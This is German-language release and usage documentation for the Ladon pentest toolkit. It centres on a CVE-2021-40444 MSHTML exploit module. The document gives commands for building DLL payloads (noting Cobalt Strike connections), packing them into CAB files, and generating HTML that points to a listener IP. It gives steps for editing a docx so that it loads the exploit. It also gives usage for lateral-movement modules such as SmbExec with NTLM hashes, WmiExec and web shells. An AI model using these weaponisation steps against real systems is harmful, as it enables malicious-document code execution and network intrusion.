
Exploit-Toolkit für CVE-2021-40444 MSHTML Remote Code Execution, mit DLL-Payload-Generierung, Office-Dokument-Erstellung und Lateral-Movement-Modulen (SmbExec, WmiExec) für Penetrationstests.
Am 8. September (Pekinger Zeit) entdeckte das CERT von NSFOCUS, dass Microsoft ein Sicherheitsbulletin veröffentlichte, das die Sicherheitslücke zur Remote-Codeausführung in Microsoft MSHTML offenlegte. Angreifer können bösartige ActiveX-Steuerelemente erstellen, die von Microsoft Office-Dokumenten verwendet werden, die eine Browser-Rendering-Engine hosten. Wenn ein Benutzer erfolgreich dazu verleitet wird, ein bösartiges Dokument zu öffnen, kann der Angreifer auf dem Zielsystem beliebigen Code mit den Berechtigungen des Benutzers ausführen. Microsoft gab in dem Bulletin an, dass die Sicherheitslücke bereits in freier Wildbahn ausgenutzt wurde, und forderte die betroffenen Benutzer auf, Schutzmaßnahmen zu ergreifen.
MSHTML (auch als Trident bekannt) ist die Internet Explorer-Browser-Engine von Microsoft und wird auch in Office-Anwendungen verwendet, um gehostete Webinhalte in Word-, Excel- oder PowerPoint-Dokumenten darzustellen. ActiveX-Steuerelemente sind ein Produkt der Microsoft-COM-Architektur und werden häufig in Windows Office-Suiten und im IE-Browser verwendet. Mit ActiveX-Steuerelementen kann mit der MSHTML-Komponente interagiert werden.
Einschließlich Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
Ladon 8.9 (14.09.2021) [+]CVE-2021-40444 Sicherheitslücke zur Remote-Codeausführung in Microsoft MSHTML, Modul zur Ausnutzung in Office-Dokumenten Betroffene Versionen: Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 [+]CmdDll cmd zu DLL (Payload zum Ausführen von Befehlen über DLL bei 0day-Sicherheitslücken in Windows-Systemen, kann direkt über PowerShell eine CobaltStrike-Verbindung herstellen) Überlauf-Sicherheitslücken wie MS17010, lokale Rechteausweitung CVE-2021-1675 usw., Nicht-Überlauf wie die neueste Office-Sicherheitslücke CVE-2021-40444 usw.
Ladon 8.8 (11.09.2021) [+]SmbExec NTLM-Hash nicht-interaktiv ausführen ohne Rückmeldung [u]GetInfo Neue Informationen zu VMware-VMs [u]OsScan Neue Erkennung von Vigor-Routern [u]Neue Erkennung von Xen\VBOX\Hybrid\Parallels-VMs [+]GetInfo Neu: cmdkey, RrpLog, Treiberinstallation, Softwareliste, zuletzt aufgerufene Dateien usw. [+]GetInfo Neu: GUID, CPUID, Festplatten-ID, Erkennung von Autostart-Backdoors (DLL-Hijacking, Registrierung usw.) [+]GetInfo2 Neu: Abruf von WMI-Patch-Informationen [+]Standardinformationen Neu: Hervorhebung, wenn freier Speicherplatz auf Laufwerk C kleiner als 2 GB ist
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Bitte verwenden Sie den entsprechenden CMD-Befehl, um die DLL zu generieren. Das Beispiel öffnet den Taschenrechner.
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
Hinweis: Für dieses Modul ist Ladon40.exe erforderlich.
Win10 x64 Office 2019
Verwenden Sie einfach eine Testversion, es ist nicht nötig, sie zu aktivieren. Wenn Sie eine IMG-Datei heruntergeladen haben, ändern Sie die IMG-Erweiterung in ZIP und entpacken Sie sie zur Installation.
Da das Ziel ein Win10 x64-System ist, verwenden wir eine 64-Bit-DLL. Befehl: Ladon CVE-2021-40444 MakeCab sc64.dll
Erstellen Sie die HTML-Datei. Die URL muss auf die Adresse verweisen, die Ladon überwacht.
Die Beispieldatei wurde am 10. September im kleinen Kreis veröffentlicht. Ändern Sie die Dateierweiterung von docx in cab oder zip, um die rels-Datei zu bearbeiten. Verweisen Sie auf die Adresse, die Ladon überwacht (poc.html), speichern Sie und benennen Sie sie wieder in .docx um.
Wenn Sie die DOC-Datei unter Windows 10 ausführen, können Sie den gesamten Anforderungsprozess über das Ladon-Listening sehen: Die DOCX-Datei greift zuerst auf die HTML-Datei zu, die Sicherheitslücke löst das Laden unserer gepackten CAB-Datei aus, über CPL wird die INF-Installation ausgeführt, unsere DLL wird geladen. Die Demo zeigt, dass die DLL-Funktion einen Taschenrechner öffnet.
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
Wenn Sie unter der Cobalt Strike-Shell SmbExec mit Parametern ausführen, die Leerzeichen und Anführungszeichen enthalten, gibt es Probleme mit der CS-Escape-Sequenz. Die Verwendung normaler CMD-Befehle ist umständlich, daher habe ich einen b64cmd-Parameter hinzugefügt, um die Verwendung in CS zu erleichtern. (Diese Methode wurde vor einigen Monaten in BypassUac verwendet. Viele Leute fragen sich, warum das so gemacht wird – warum nicht einfach direkte CMD-Befehle verwenden, sondern eine zusätzliche Verschlüsselung? Wenn Ihr CMD-Befehl viele Escape-Sequenzen enthält, werden Sie verstehen, warum: Es ist mühsam, über CS-Escape zu CMD-Escape zu gelangen, um einen normalen CMD-Befehl zu erhalten.) Der b64cmd-Befehl kann mit Base64Unicode-Verschlüsselung in LadonGUI ab Version 8.2 erstellt werden.
| ID | Modulname | Funktionsbeschreibung | Verwendung |
|---|---|---|---|
| 1 | WmiExec | Befehl auf Port 135 ausführen | http://k8gege.org/Ladon/WinShell.html |
| 2 | PsExec | Befehl auf Port 445 ausführen | http://k8gege.org/Ladon/WinShell.html |
| 3 | AtExec | Befehl auf Port 445 ausführen | http://k8gege.org/Ladon/WinShell.html |
| 4 | SshExec | Befehl auf Port 22 ausführen | http://k8gege.org/Ladon/WinShell.html |
| 5 | JspShell | Jsp-One-Liner-Befehl ausführen | http://k8gege.org/p/ladon_cs_shell.html |
| 6 | WebShell | WebShell-Befehl ausführen | http://k8gege.org/Ladon/webshell.html |
| 7 | WinrmExec | Befehl auf Port 5895 ausführen | http://k8gege.org/Ladon/WinrmExec.html |
| 8 | SmbExec | Befehl mit Hash auf Port 445 ausführen | http://k8gege.org/Ladon/SmbExec.html |
PowerLadon: https://github.com/k8gege/PowerLadon Frühere Versionen: http://github.com/k8gege/Ladon/releases Version 7.0: http://k8gege.org/Download Version 8.9: K8 kleiner Kreis